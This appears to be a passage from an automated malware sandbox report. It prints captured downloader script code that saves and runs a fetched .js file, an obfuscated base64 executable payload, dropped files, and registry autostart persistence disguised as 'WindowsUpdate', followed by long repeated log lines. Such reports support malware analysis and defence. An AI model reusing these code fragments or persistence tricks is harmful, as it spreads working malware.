"false");IServerXMLHTTPRequest2.send();IFileSystem3.GetSpecialFolder("2");IFolder.Path();IServerXMLHTTPRequest2.status();_Stream.Open();_Stream.Type("1");IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp/OLWJMU.js")
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '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
              .NET source code contains potential unpacker
              Source: GeUT.exe.3.dr, Program.cs.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: Service.exe.4.dr, Program.cs.Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_05D817A7 push 14518905h; ret 5_2_05D819B3
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_06CAC483 push es; iretd 5_2_06CAC484
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07CB801C push es; retf 5_2_07CB7FDF
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 5_2_07D14838 push esp; ret 5_2_07D14841
              Source: GeUT.exe.3.drStatic PE information: section name: .text entropy: 7.937538668947789
              Source: Service.exe.4.drStatic PE information: section name: .text entropy: 7.937538668947789
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\GeUT.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile created: C:\Users\user\AppData\Roaming\Service.exeJump to dropped file

              Boot Survival

              barindex
              Creates multiple autostart registry keys
              Source: C:\Users\user\AppData\Roaming\Service.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Roaming\Service.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Roaming\Service.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Roaming\Service.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\497B5ED3636167B0F1E8 436ACE6829F875FEC7CFDC9CAE0283849C6021AF7AE44C96E35989B0FF7E6B20Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
